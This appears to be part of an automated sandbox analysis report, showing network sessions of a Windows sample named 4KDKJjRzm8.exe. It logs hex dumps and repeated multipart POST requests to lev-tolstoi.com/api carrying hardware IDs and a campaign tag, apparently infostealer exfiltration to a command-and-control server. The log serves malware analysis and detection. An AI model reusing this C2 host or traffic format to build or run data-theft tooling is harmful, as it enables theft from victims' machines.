                                                                                                                                                                                                                                                      2024-12-26 11:54:14 UTC1369INData Raw: 58 63 31 45 37 79 6d 50 53 43 6b 77 76 4c 63 4e 36 4a 77 78 52 34 30 50 6e 2f 6c 75 77 78 32 32 79 73 2b 36 45 50 53 53 52 6d 30 78 4a 56 69 44 55 65 64 41 55 51 47 67 36 68 47 52 6f 44 46 57 6c 46 4b 53 32 47 66 37 46 64 76 33 73 72 36 51 2f 4b 4a 4b 4d 53 56 41 53 4e 5a 56 76 6e 78 31 47 4c 32 72 4e 5a 57 6b 4b 55 4b 4d 4a 72 2f 31 63 75 39 42 6c 74 4c 6e 69 68 43 49 68 6e 70 74 45 52 6c 67 67 31 48 7a 62 46 30 64 70 4d 6f 30 6a 4b 55 74 61 75 31 76 2f 74 6e 53 37 30 6d 6d 78 6f 71 32 2b 62 7a 54 66 67 51 52 47 58 6d 71 44 4e 74 63 66 53 57 77 35 67 6d 42 76 41 45 2b 6a 43 61 48 37 55 71 7a 45 61 37 4f 2b 37 4a 59 6c 4a 5a 65 62 54 55 70 62 4c 39 78 79 6e 31 51 4b 61 43 72 4e 4f 79 63 71 55 4b 67 58 72 65 46 58 2f 74 30 67 70 50 54 6f 69 47 39 7a 30 5a
                                                                                                                                                                                                                                                      Data Ascii: Xc1E7ymPSCkwvLcN6JwxR40Pn/luwx22ys+6EPSSRm0xJViDUedAUQGg6hGRoDFWlFKS2Gf7Fdv3sr6Q/KJKMSVASNZVvnx1GL2rNZWkKUKMJr/1cu9BltLnihCIhnptERlgg1HzbF0dpMo0jKUtau1v/tnS70mmxoq2+bzTfgQRGXmqDNtcfSWw5gmBvAE+jCaH7UqzEa7O+7JYlJZebTUpbL9xyn1QKaCrNOycqUKgXreFX/t0gpPToiG9z0Z
                                                                                                                                                                                                                                                      2024-12-26 11:54:14 UTC1369INData Raw: 5a 4a 74 78 78 31 6f 53 4c 78 69 4f 64 32 51 42 48 35 59 59 71 66 68 51 71 49 4a 78 38 36 32 76 67 79 4e 72 79 64 68 4a 51 46 6f 73 79 58 6e 53 47 55 52 68 50 59 68 73 62 77 74 64 72 68 36 6a 2f 56 79 39 7a 32 71 76 76 75 2b 4d 4b 69 71 62 6b 67 51 50 45 69 33 44 4e 6f 64 61 65 33 67 35 7a 31 5a 6b 42 56 4f 6b 44 65 66 70 47 61 65 43 61 62 48 30 74 38 51 69 49 35 53 64 53 30 42 59 4a 4e 35 38 30 78 4a 45 62 43 43 43 5a 32 63 48 56 61 6b 57 71 66 4a 66 74 38 6c 6c 75 37 54 75 6a 6d 39 6c 30 5a 39 63 41 51 70 71 37 33 48 54 46 30 55 74 42 34 35 74 61 51 78 4c 34 77 54 70 37 78 65 35 7a 69 37 6c 39 4f 4f 4e 4c 79 43 62 6e 45 52 47 58 79 2f 59 63 64 77 58 54 57 55 38 69 6d 64 72 41 6c 43 6c 47 36 44 79 55 71 7a 48 5a 37 47 34 72 38 70 76 4c 49 6e 59 48 41 46
                                                                                                                                                                                                                                                      Data Ascii: ZJtxx1oSLxiOd2QBH5YYqfhQqIJx862vgyNrydhJQFosyXnSGURhPYhsbwtdrh6j/Vy9z2qvvu+MKiqbkgQPEi3DNodae3g5z1ZkBVOkDefpGaeCabH0t8QiI5SdS0BYJN580xJEbCCCZ2cHVakWqfJft8llu7Tujm9l0Z9cAQpq73HTF0UtB45taQxL4wTp7xe5zi7l9OONLyCbnERGXy/YcdwXTWU8imdrAlClG6DyUqzHZ7G4r8pvLInYHAF
                                                                                                                                                                                                                                                      2024-12-26 11:54:14 UTC168INData Raw: 6f 64 61 51 32 59 67 67 32 31 75 42 6c 75 72 48 4b 6e 37 58 4c 6a 4a 61 62 71 79 34 6f 77 69 4c 70 4b 5a 51 45 74 41 4b 64 42 38 30 68 41 4b 49 58 4b 4b 65 79 64 54 48 59 51 58 6a 75 5a 4d 72 4e 51 75 6f 76 72 32 78 43 67 6e 30 63 41 45 51 6c 30 6a 31 48 37 58 46 55 56 72 50 49 74 6c 61 67 35 53 71 51 6d 76 2b 46 71 31 7a 57 57 76 74 4f 4b 41 49 79 2b 5a 6b 30 34 42 48 47 72 63 62 70 39 43 43 6c 6f 2f 67 6d 4e 6b 48 52 32 38 56 62 36 32 55 4c 4b 43 4e 76 32 34 34 59 51 67 4a 35 32 54 54 45 42 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: odaQ2Ygg21uBlurHKn7XLjJabqy4owiLpKZQEtAKdB80hAKIXKKeydTHYQXjuZMrNQuovr2xCgn0cAEQl0j1H7XFUVrPItlag5SqQmv+Fq1zWWvtOKAIy+Zk04BHGrcbp9CClo/gmNkHR28Vb62ULKCNv244YQgJ52TTEB
                                                                                                                                                                                                                                                      2024-12-26 11:54:14 UTC1369INData Raw: 33 63 64 31 0d 0a 65 4a 4e 78 7a 31 68 4a 43 66 54 4f 4a 61 32 59 46 55 71 49 66 6f 76 4e 54 75 63 5a 6f 73 76 53 68 78 43 67 7a 30 63 41 45 62 6e 55 66 6d 56 66 6c 57 6c 55 68 4b 38 31 6b 61 30 73 46 34 78 65 6b 2b 6c 2b 78 78 47 65 78 76 75 61 50 49 79 43 56 6c 45 31 45 56 43 76 65 63 39 34 65 52 6d 55 30 6a 6d 42 6f 42 46 4b 72 57 2b 6d 32 55 4b 61 43 4e 76 32 52 2b 49 38 68 4c 64 47 48 43 6c 67 53 4c 64 63 32 68 31 70 47 5a 6a 53 4c 5a 6d 73 4b 57 36 73 65 72 2f 4a 57 75 4d 52 74 73 72 44 71 68 53 41 76 6e 5a 5a 4f 51 46 4d 6d 30 48 6e 55 48 77 6f 68 63 6f 70 37 4a 31 4d 64 6b 68 69 78 34 55 65 79 67 6e 48 7a 72 61 2b 44 49 32 76 4a 32 45 56 54 57 43 44 56 63 39 41 66 53 57 41 31 67 47 56 72 41 56 53 72 48 61 6a 2f 52 62 33 4f 59 4c 71 36 34 34 6f 69
                                                                                                                                                                                                                                                      Data Ascii: 3cd1eJNxz1hJCfTOJa2YFUqIfovNTucZosvShxCgz0cAEbnUfmVflWlUhK81ka0sF4xek+l+xxGexvuaPIyCVlE1EVCvec94eRmU0jmBoBFKrW+m2UKaCNv2R+I8hLdGHClgSLdc2h1pGZjSLZmsKW6ser/JWuMRtsrDqhSAvnZZOQFMm0HnUHwohcop7J1Mdkhix4UeygnHzra+DI2vJ2EVTWCDVc9AfSWA1gGVrAVSrHaj/Rb3OYLq644oi
                                                                                                                                                                                                                                                      2024-12-26 11:54:14 UTC1369INData Raw: 4e 49 57 54 6a 52 63 64 67 52 51 6d 51 39 69 33 46 72 42 55 2b 6d 43 62 57 32 47 66 37 46 64 76 33 73 72 37 49 6f 4f 34 47 62 42 6e 42 45 4b 63 31 39 30 68 59 4b 63 48 79 55 49 32 41 48 48 66 74 62 6f 66 6c 65 76 63 31 76 74 4c 6a 69 67 53 59 75 6b 4a 35 41 53 31 67 71 33 58 44 65 48 30 42 73 4d 34 64 71 59 41 4e 61 6f 41 6e 6e 75 42 65 35 32 69 37 6c 39 4d 61 44 50 53 57 42 32 46 73 50 53 32 72 63 65 70 39 43 43 6d 73 34 67 6d 64 67 42 31 75 6d 48 61 72 33 57 4c 2f 43 59 62 6d 2f 35 6f 49 75 4a 70 53 56 51 46 4e 59 49 64 52 36 31 68 5a 48 4c 33 7a 4e 5a 48 39 4c 42 65 4d 71 71 76 68 5a 75 64 51 75 6f 76 72 32 78 43 67 6e 30 63 41 45 51 46 34 6c 32 48 6e 63 47 55 74 6c 49 4a 39 76 62 67 4e 59 72 78 43 70 38 45 57 34 7a 57 65 2b 74 2b 61 44 4a 79 65 62 6d
                                                                                                                                                                                                                                                      Data Ascii: NIWTjRcdgRQmQ9i3FrBU+mCbW2Gf7Fdv3sr7IoO4GbBnBEKc190hYKcHyUI2AHHftboflevc1vtLjigSYukJ5AS1gq3XDeH0BsM4dqYANaoAnnuBe52i7l9MaDPSWB2FsPS2rcep9CCms4gmdgB1umHar3WL/CYbm/5oIuJpSVQFNYIdR61hZHL3zNZH9LBeMqqvhZudQuovr2xCgn0cAEQF4l2HncGUtlIJ9vbgNYrxCp8EW4zWe+t+aDJyebm
                                                                                                                                                                                                                                                      2024-12-26 11:54:14 UTC1369INData Raw: 71 67 32 44 50 44 55 31 77 66 4a 51 6a 59 41 63 64 2b 31 75 68 2f 31 47 35 78 47 43 76 73 65 6d 4c 49 43 4b 59 6e 45 78 43 55 69 37 66 63 64 6f 5a 52 6d 51 31 6a 6d 78 6a 41 6c 4f 71 46 4f 65 34 46 37 6e 61 4c 75 58 30 7a 70 38 73 4a 35 7a 59 57 77 39 4c 61 74 78 36 6e 30 49 4b 59 7a 79 49 59 32 30 4e 57 61 59 64 72 66 4e 58 74 63 46 68 75 62 4c 72 69 79 38 67 6d 4a 6c 43 52 46 67 68 33 58 76 63 48 45 77 76 66 4d 31 6b 66 30 73 46 34 7a 75 38 2b 31 75 35 67 6e 48 7a 72 61 2b 44 49 32 76 4a 32 45 39 4e 56 69 33 62 65 39 77 53 54 32 73 34 69 47 4e 76 47 56 57 6a 48 4c 58 6b 56 37 66 48 59 72 36 30 36 34 49 6d 4c 5a 4b 63 42 41 38 53 4c 63 4d 32 68 31 70 6e 59 7a 57 6b 5a 48 78 4c 51 75 30 43 35 2f 46 62 2f 70 6f 75 76 4c 2f 6c 69 79 49 6f 6c 35 74 50 52 46
                                                                                                                                                                                                                                                      Data Ascii: qg2DPDU1wfJQjYAcd+1uh/1G5xGCvsemLICKYnExCUi7fcdoZRmQ1jmxjAlOqFOe4F7naLuX0zp8sJ5zYWw9Latx6n0IKYzyIY20NWaYdrfNXtcFhubLriy8gmJlCRFgh3XvcHEwvfM1kf0sF4zu8+1u5gnHzra+DI2vJ2E9NVi3be9wST2s4iGNvGVWjHLXkV7fHYr6064ImLZKcBA8SLcM2h1pnYzWkZHxLQu0C5/Fb/pouvL/liyIol5tPRF
                                                                                                                                                                                                                                                      2024-12-26 11:54:14 UTC1369INData Raw: 6e 77 77 4b 4e 32 44 44 49 33 56 4c 42 65 4e 63 70 4f 52 46 75 4d 46 34 76 76 50 52 75 67 67 39 6d 35 39 55 52 6b 55 6c 6d 7a 69 66 46 51 6f 33 43 38 31 71 59 42 42 4d 74 52 61 33 38 52 65 42 6a 43 36 6c 39 4c 66 45 47 69 69 66 6c 6b 4e 58 51 32 66 38 59 4e 55 64 57 6d 67 6c 67 69 4d 70 53 31 76 6a 51 2f 53 34 46 37 72 54 4c 75 58 6b 76 64 39 36 65 4d 62 49 46 6c 34 63 4d 35 74 67 6e 30 49 59 49 58 4b 66 49 7a 39 4c 47 71 41 4a 74 66 42 55 71 4d 45 70 67 34 72 49 6e 69 49 74 68 6f 6c 36 66 31 55 77 31 6e 44 49 43 77 5a 36 4d 59 4e 74 59 42 30 64 37 56 75 6f 74 67 2b 48 67 69 62 39 69 36 48 45 4e 32 76 4a 32 48 46 43 58 43 54 63 59 4d 35 58 62 58 55 2f 69 33 52 32 53 78 50 6a 48 65 65 75 42 2f 43 43 61 71 7a 30 74 39 52 39 63 4d 54 4c 45 78 45 41 4e 5a 56
                                                                                                                                                                                                                                                      Data Ascii: nwwKN2DDI3VLBeNcpORFuMF4vvPRugg9m59URkUlmzifFQo3C81qYBBMtRa38ReBjC6l9LfEGiiflkNXQ2f8YNUdWmglgiMpS1vjQ/S4F7rTLuXkvd96eMbIFl4cM5tgn0IYIXKfIz9LGqAJtfBUqMEpg4rIniIthol6f1Uw1nDICwZ6MYNtYB0d7Vuotg+Hgib9i6HEN2vJ2HFCXCTcYM5XbXU/i3R2SxPjHeeuB/CCaqz0t9R9cMTLExEANZV
                                                                                                                                                                                                                                                      2024-12-26 11:54:14 UTC1369INData Raw: 57 45 38 69 6e 56 32 53 78 50 6a 46 4f 65 75 62 76 36 4b 4c 6f 4c 36 72 35 78 76 63 39 47 74 52 30 39 63 4c 63 31 6e 6b 6a 31 45 61 44 4f 62 63 33 41 45 48 65 31 62 6f 62 59 50 37 49 77 75 75 61 57 76 33 48 39 35 79 73 30 58 46 67 4a 34 78 44 6a 47 57 6c 77 76 61 74 38 74 4a 78 6b 64 2b 31 76 67 39 55 57 73 78 47 32 72 74 36 69 36 45 51 79 66 6e 30 56 58 51 6a 33 55 4f 66 45 73 61 31 45 4d 6d 47 42 70 42 56 71 31 43 75 65 34 46 37 47 43 4e 6f 54 30 70 38 51 51 5a 64 47 41 42 42 6b 53 48 39 68 34 30 52 31 63 66 6e 2b 71 62 57 41 4b 53 37 4d 4d 71 4c 6c 35 69 4f 4d 75 38 2f 54 70 78 48 64 35 33 39 68 41 55 42 4a 79 69 79 53 45 54 78 6b 34 59 74 39 38 4b 52 49 64 74 56 76 2f 70 42 6e 2b 30 43 37 6c 39 4b 69 48 50 54 6d 58 6d 31 4a 43 46 52 54 6c 55 64 45 64
                                                                                                                                                                                                                                                      Data Ascii: WE8inV2SxPjFOeubv6KLoL6r5xvc9GtR09cLc1nkj1EaDObc3AEHe1bobYP7IwuuaWv3H95ys0XFgJ4xDjGWlwvat8tJxkd+1vg9UWsxG2rt6i6EQyfn0VXQj3UOfEsa1EMmGBpBVq1Cue4F7GCNoT0p8QQZdGABBkSH9h40R1cfn+qbWAKS7MMqLl5iOMu8/TpxHd539hAUBJyiySETxk4Yt98KRIdtVv/pBn+0C7l9KiHPTmXm1JCFRTlUdEd


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      3192.168.2.949740172.67.157.2544431460C:\Users\user\Desktop\4KDKJjRzm8.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-26 11:54:16 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=O0KPXZESU3AA06KV
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 12833
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                      2024-12-26 11:54:16 UTC12833OUTData Raw: 2d 2d 4f 30 4b 50 58 5a 45 53 55 33 41 41 30 36 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 41 34 33 31 31 33 32 38 44 35 31 30 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4f 30 4b 50 58 5a 45 53 55 33 41 41 30 36 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 30 4b 50 58 5a 45 53 55 33 41 41 30 36 4b 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4f 30
                                                                                                                                                                                                                                                      Data Ascii: --O0KPXZESU3AA06KVContent-Disposition: form-data; name="hwid"17A4311328D510E6BEBA0C6A975F1733--O0KPXZESU3AA06KVContent-Disposition: form-data; name="pid"2--O0KPXZESU3AA06KVContent-Disposition: form-data; name="lid"PsFKDg--pablo--O0
                                                                                                                                                                                                                                                      2024-12-26 11:54:17 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:17 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=91ig3s1sji6uolilp9krt2n9ki; expires=Mon, 21 Apr 2025 05:40:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2FVNUNNvXJdj4CeBTKTJAAZe8o6RZn%2BLBVBYsbssEzu2tSq%2BrtcdSlS10%2FqBKiS3Wx6pAJKhrUG5OQvbF%2B%2FPVeBc%2BAC77Sev4rfLuy390tTAgQQRUEDgoYHYQhGzDl3xYJo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80e00f4f8443ec-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1650&rtt_var=637&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13770&delivery_rate=1693735&cwnd=229&unsent_bytes=0&cid=6d684939ec1a4e50&ts=843&x=0"
                                                                                                                                                                                                                                                      2024-12-26 11:54:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                      2024-12-26 11:54:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      4192.168.2.949746172.67.157.2544431460C:\Users\user\Desktop\4KDKJjRzm8.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-26 11:54:18 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=AI1H7NMTB09653LBR
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 15057
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                      2024-12-26 11:54:18 UTC15057OUTData Raw: 2d 2d 41 49 31 48 37 4e 4d 54 42 30 39 36 35 33 4c 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 41 34 33 31 31 33 32 38 44 35 31 30 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 41 49 31 48 37 4e 4d 54 42 30 39 36 35 33 4c 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 49 31 48 37 4e 4d 54 42 30 39 36 35 33 4c 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                                                                                                                                                                      Data Ascii: --AI1H7NMTB09653LBRContent-Disposition: form-data; name="hwid"17A4311328D510E6BEBA0C6A975F1733--AI1H7NMTB09653LBRContent-Disposition: form-data; name="pid"2--AI1H7NMTB09653LBRContent-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                                                                                                                                                                      2024-12-26 11:54:20 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:19 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=ubolkfdt4sjk1rbhking58bamo; expires=Mon, 21 Apr 2025 05:40:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bou3RN%2BEn9HFmuDrkVevvVrpWP3IdyXt0MDEoC6aUeu37maj0J6OXLfDhiSnQOm0OA9Oz3fGug8%2FViv7S7JqPoqnRCaW1lsw3G2lbFds9deS4NPwltYGR4ey6wuF6SqBQsg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80e01d7f5f438a-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1768&rtt_var=669&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15995&delivery_rate=1626740&cwnd=210&unsent_bytes=0&cid=4e4cb4741ed5d990&ts=1098&x=0"
                                                                                                                                                                                                                                                      2024-12-26 11:54:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                      2024-12-26 11:54:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      5192.168.2.949752172.67.157.2544431460C:\Users\user\Desktop\4KDKJjRzm8.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-26 11:54:21 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=PCKY9Q7KIM5
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                      Content-Length: 20537
                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                      2024-12-26 11:54:21 UTC15331OUTData Raw: 2d 2d 50 43 4b 59 39 51 37 4b 49 4d 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 41 34 33 31 31 33 32 38 44 35 31 30 45 36 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 50 43 4b 59 39 51 37 4b 49 4d 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 50 43 4b 59 39 51 37 4b 49 4d 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 50 43 4b 59 39 51 37 4b 49 4d 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: --PCKY9Q7KIM5Content-Disposition: form-data; name="hwid"17A4311328D510E6BEBA0C6A975F1733--PCKY9Q7KIM5Content-Disposition: form-data; name="pid"3--PCKY9Q7KIM5Content-Disposition: form-data; name="lid"PsFKDg--pablo--PCKY9Q7KIM5Cont
                                                                                                                                                                                                                                                      2024-12-26 11:54:21 UTC5206OUTData Raw: bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 fa a3 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                      Data Ascii: s}Q0u?4E([:s~X`nO
                                                                                                                                                                                                                                                      2024-12-26 11:54:22 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Thu, 26 Dec 2024 11:54:22 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=cjiqgpaqqondqbk9rolt72anip; expires=Mon, 21 Apr 2025 05:41:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wELkaoYoAHKHPRT1CBxiTIOqoZRasNYg4Czc3j1DtE2lHuXaGP%2B%2BqaQg8A9l5gLbKgLSUyDW2aYSPHzbXc4PyCDrdsIiSUtS5sVEDwHFK7EgZSDdsk1xSS5t%2BT9VaiasvX8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f80e02e8c277d05-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2078&min_rtt=2046&rtt_var=790&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21491&delivery_rate=1427174&cwnd=195&unsent_bytes=0&cid=6968ce731ed2fcc3&ts=983&x=0"
                                                                                                                                                                                                                                                      2024-12-26 11:54:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                      2024-12-26 11:54:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      6192.168.2.949761172.67.157.2544431460C:\Users\user\Desktop\4KDKJjRzm8.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
